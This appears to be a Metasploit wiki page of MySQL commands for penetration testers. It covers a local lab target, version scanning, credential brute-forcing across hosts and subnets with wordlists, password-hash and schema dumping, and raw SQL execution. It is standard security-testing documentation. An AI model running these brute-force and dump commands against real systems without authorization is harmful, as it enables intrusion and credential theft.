-
Notifications
You must be signed in to change notification settings - Fork 14.2k
Metasploit Guide MySQL
adfoster-r7 edited this page Apr 22, 2022
·
5 revisions
For instance, when running a MySQL target:
docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest
Enumerate version:
use auxiliary/scanner/mysql/mysql_version
run mysql://127.0.0.1
If you have MySQL credentials to validate:
use auxiliary/scanner/mysql/mysql_login
run 'mysql://root: a b c [email protected]'
Re-using MySQL credentials in a subnet:
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
Using an alternative port:
use auxiliary/scanner/mysql/mysql_login
run mysql://user:[email protected]:2222
Brute-force host with known user and password list:
use auxiliary/scanner/mysql/mysql_login
run mysql://[email protected] threads=50 pass_file=./wordlist.txt
Brute-force credentials:
use auxiliary/scanner/mysql/mysql_login
run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt
Brute-force credentials in a subnet:
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
run cidr:/24:mysql://[email protected] threads=50 pass_file=./wordlist.txt
User and hash dump:
use auxiliary/scanner/mysql/mysql_hashdump
run 'mysql://root: a b c [email protected]'
Schema dump:
use auxiliary/scanner/mysql/mysql_schemadump
run 'mysql://root: a b c [email protected]'
Execute raw SQL:
use admin/mysql/mysql_sql
run 'mysql://root: a b c [email protected]' sql='select version()'
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get installtogit push. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.